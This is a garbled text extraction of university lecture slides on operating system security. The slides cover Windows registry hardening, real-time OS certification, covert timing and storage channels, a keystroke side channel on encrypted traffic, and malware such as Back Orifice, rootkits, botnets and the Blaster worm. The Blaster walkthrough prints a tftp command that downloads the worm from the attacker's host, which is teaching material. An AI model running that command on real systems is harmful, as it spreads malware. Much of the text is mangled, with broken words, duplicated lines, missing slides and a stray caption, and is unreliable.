1 INSE 6130 Operating System Security Odds and Ends 1 Prof. Lingyu Wang Outline Registry Security Embedded and Real-Time OS Security Information Flow The Phantom Menace Review for Final Exam 2 Registry What is registry Configuration data stored in a hierarchical database R l f ii d fi i fil Replacement of .ini, .sys, and .com configuration files A tree with five root keys HKEY_LOCAL_MACHINE: hardware/OS data of this computer HKEY_CLASSES_ROOT: OLE and file-class association data HKEY_CURRENT_USER: profile for user logged on interactively HKEY_USERS: actively user profiles of non-remote users HKEY CURRENT CONFIG: hardware profile 3 HKEY_CURRENT_CONFIG: hardware profile Hives (trees rooted at top) DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config and ntuser.dat in C:\Documents and Settings\administrator http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx Registry Best Practice One incorrect edit to the registry can crash the operating system If you are not completely sure about what you are doing, then better don't do it Backup before you modify it Use the backup utility (accessories->system tools) Export/import registry hives 4
Transcript
1
INSE 6130 Operating System Security
Odds and Ends
1
Prof. Lingyu Wang
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
2
RegistryWhat is registry
Configuration data stored in a hierarchical databaseR l f i i d fi i filReplacement of .ini, .sys, and .com configuration filesA tree with five root keys
HKEY_LOCAL_MACHINE: hardware/OS data of this computerHKEY_CLASSES_ROOT: OLE and file-class association dataHKEY_CURRENT_USER: profile for user logged on interactively HKEY_USERS: actively user profiles of non-remote usersHKEY CURRENT CONFIG: hardware profile
3
HKEY_CURRENT_CONFIG: hardware profileHives (trees rooted at top)
DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config and ntuser.dat in C:\Documents and Settings\administrator
One incorrect edit to the registry can crash the operating system
If you are not completely sure about what you are doing, then better don't do it
Backup before you modify itUse the backup utility (accessories->system tools)Export/import registry hives
4
2
Access Control on Registry
What you can do in regedit“can” does not mean you shouldGrant full control/ownership of a registry key Assign (customized) permissions to a registry key to users or groupsAudit users/groups’ activity on a registry key
Restricting accesses
5
Local accesses: you can only make it inconvenientRemote accesses: shouldn’t be given in most cases
Domain controllers have accesses
Registry Hacks for Hardening OS
E.g., prevent NTLM password hashesXP and Windows 2000 use kerberos and NTLM hash is there for backwards compatibilityNTLM hashes can be easily broken by Rainbow crack
KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa Win2K: Add NoLMHash = 1Xp: Value name: NoLMHash, Data type: REG_DWORD Radix: Decimal Value data: 1
E t (SYN) D S tt k i W2k
6
E.g., prevent (SYN) DoS attacks in W2kThe connection responses time out more quickly in the event of a SYN attack
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key: SynAttackProtectValue: 0,1,2 (default to best protection)
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
7
Where Are Embedded/Real-time OS?
B b di Ch ll
US Army's Crusader
RTOS processes ballistic calculations, the graphical
Bombardier Challenger 300
RTOS in the adaptive flight display systems
8
user interface and real-time equipment control systems
F-35
RTOS powers a portion of the Panoramic Cockpit Display subsystem
http://www.lynuxworks.com/rtos/rtos-178.php
3
Why Are Such Systems different?
A time constraint on an operation MUST be met regardless of the system load
Not the case on our PCsA good example: Anti-lock braking system (ABS)
System reliability, availability, etc.Availability= (mean time to
failure/recovery)MTTRMTTFMTTF+
9
The Standard for RTOSDO-178B: "Software Considerations in Airborne Systems and Equipment Certification"
A de facto standard for certifying aviation software such as RTOSA de facto standard for certifying aviation software, such as RTOSSoftware systems are categorized by the effects of their failures
A: Catastrophic - Failure may cause a crash B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane .. C: Major - Failure is significant, but has a lesser impact that a Hazardous failure (e.g., leads to passenger discomfort)D: Minor Failure is noticeable but has a lesser impact than a Major
10
D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e.g., causing passenger inconvenience or a flight plan change) E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
The development process of a software is subject to different requirements based on its level
LynxOS-178 RTOS
An RTOS certifiable to DO-178B level AProvides security through fixed partitions of resources (time and memory)System events in one partition cannot interfere with events in another
E.g., CD player and ABS
11
Safety and Security
Common Criteria (CC)A standard (ISO/IEC 15408) for computer securityA framework for specifying security requirements and implementing/claiming and testing such requirements
DO-178B and CCSoftware developed to DO-178B Level A standards will map closely to either an EAL 4 or 5CC basically requires a small kernel capable of control
12
CC basically requires a small kernel capable of control information flow and maintain data isolation DO-178B kernel space partitioning provides bothFrom DO-178B to EAL 7, mostly formal method
http://www.csds.uidaho.edu/comparison/stc2002.pdf
4
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
13
What We Already Know
Information flows whenI write to slides (push) You read slides (pull)You read what I have written
Information flow policy in BLP and BibaBLP: flow up (e.g., unclassfied to secret)Biba: flow down (e.g., high integrity to low integrity)
14
Chinese Wall: flow inside a CD (except sanitized)
Question:How to we model/measure “information flow”?
Answer: EntropyH(X) = - Σi p(X=xi) log2 p(X=xi)
Measures the uncertainty of XHow many bits required to represent X
Example 1 – Storage ChannelProcesses p, q not allowed to communicate
But they share a file system
They set up a storage channelAgree on two file names, /tmp001.txt and /tmp002.txt If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txtq records a bit based on the file name, and then deletes the file so p can send the next bit
22
the file, so p can send the next bit
p q
/tmp001.txt
1 p q
/tmp002.txt
0
Example 2 – Timing ChannelTiming attack on cryptosystem
Modular exponentiation algorithm (square and multiply)C t z d hComputes x = az mod n, where z = z0 … zk–1
x := 1; atmp := a;for i := 0 to k–1 do beginif zi = 1 then
x := (x * atmp) mod n;atmp := (atmp * atmp) mod n;
endresult := x;
23
Each 1 bit of z results in two multiplicationsRun time will be proportional to number of 1 bits
Example 3 – Timing ChannelTwo processes set up a timing channel
To send 0 bit: p relinquishes CPU as soon as it gets CPUTo send 1 bit: p uses CPU for the full timing slotq determines a bit by seeing how quickly it gets CPU
t CPU d li i h it p gets CPU p relinquishes CPU
24
p gets CPU, and relinquishes it
q gets CPU1
p gets CPU p relinquishes CPU
q gets CPU0
7
Noise/Mitigation of Covert ChannelWhen many processes share the same resource, the covert channel will be noisy
Noise will reduce the capacity of a covert channelBut does not remove it (remember any communication channel is noisy)
Mitigation of covert channel: obscure resource usageDevote uniform, fixed amount of resources to each process, even if some resources are wasted
25
even if some resources are wastedCrypto example, CPU example (e.g., RTOS)
Inject randomness into allocation/use of resources
Make Positive Use of Covert ChannelTracking anonymous P2P VOIP calls Alice
The connection between them is mixed with many others
Headers modifiedPayload encrypted
Suppose we suspect
Anonymizing network
26
Alice is talking to BobHow do we prove it?
Bob
Make Use of Covert Channel Cont’dTrack the call by transmitting a watermark through a timing channel based on inter-packet delays
BobAlice
BobAlice Add Watermark: 1011Detect Watermark
27
Bit 1 Bit 0
Question: why we always move packet to the right?
Web-based Application
Internet
Client Server
Advantages: Characteristics:
Encrypted Traffic
28
Less client-side resources
Easier to deliver and maintain
Low entropy inputs
Rich & diverse resource objects
Stateful communications
8
Side-Channel Attack
InternetSize and directions of packets between users and search engine
Client ServerEncrypted Traffic
User Input Observed Directional Packet Sizes
a: 801→, ←54, ←509, 60→
00: 812→, ←54, ←505, 60→,
Fixed pattern: identified input string
29
00: 812 , 54, 505, 60 ,
813→, ←54, ←507, 60→
b-byte s-byte
Indicator of input itself
Side-Channel Attack Cont’dS value for each character entered as:First keystroke: Second keystroke:
a b c d e f g
509 504 502 516 499 504 502
h i j k l m n
509 492 517 499 501 503 488
o p q r s t
509 525 494 498 488 494
First Keystroke
Second Keystroke
a b c d
a 509 487 493 501 497
b 504 516 488 482 481
c 502 501 488 473 477
30
u v w x y z
503 522 516 491 502 501 d 516 543 478 509 499
Unique s value 12 out of 1616 out of 16In reality, it may take more than
two keystrokes to uniquely identify an input string.
Leak out users’ private information: the input string
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
Special user identifier/password that circumvents normal security p oced esprocedures.
Commonly used by developersCould be included in a compiler (e.g., Ken Thompson)
Example: Back Orifice (BO) Win98 at DEFCON 6 in 1998, BO2k in 1999 BO server can be embedded in an executable file, when you run
33
, ythat file, BO silently installs itself as 122K “ .exe”Run a BO client, scan network for port 31337 (ELEET-elite), find any BO server - that machine is yours
Logic Bomb
Embedded in legitimate programsActivated when specified conditions metp
E.g., presence/absence of some file; Particular date/time or particular user
When triggered, typically damages systemModify/delete files/disks
Example: “CIA slipped bugs to Soviets”“In January 1982 President Ronald Reagan approved
34
“In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that later triggered a huge explosion in a Siberian natural gas pipeline”
Rootkit
A set of programs and codes that allows a permanent or consistent, undetectable presence on a computer
8. Sends START msblast.exe command 9. Runs worm on target!
>tftp –I 192.168.0.1 GET msblast.exe
38
192.168.0.1Blaster Target/RPC
192.168.10.11
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port
4444/TCP via injected code
BotnetZombie
A computer that is secretly installed with Trojan h d b d f tt khorse and can be used for attacksBots join specific IRC channel on a Server and wait for further commandsAttacker remotely controls the bot
BotnetA network of zombies controlled by a ‘bot herder’
39
A network of zombies controlled by a bot herderConsisting of several ten thousands of botsUsually for malicious purposes
Botnets Cont’d
Botnet is usually for profitDistributed Denial-of-Service (DDoS) AttacksSpamming – install SOCKS v4/v5 proxy for spam emailsSniffing traffic/key logging – e.g., credit card numberSpreading new worms/virusesAds add-ons, spyware, phishing
![[Kevin’s Attic for Security Research] Windows Registry Artifactsdandylife.net/docs/Windows-Registry-Artifacts.pdf · 2013. 7. 22. · 2 What to Cover Kevin’s Attic for Security](https://static.documents.pub/doc/80x56/5fed4c015862ad0e7d411b24/kevinas-attic-for-security-research-windows-registry-2013-7-22-2-what-to.jpg)
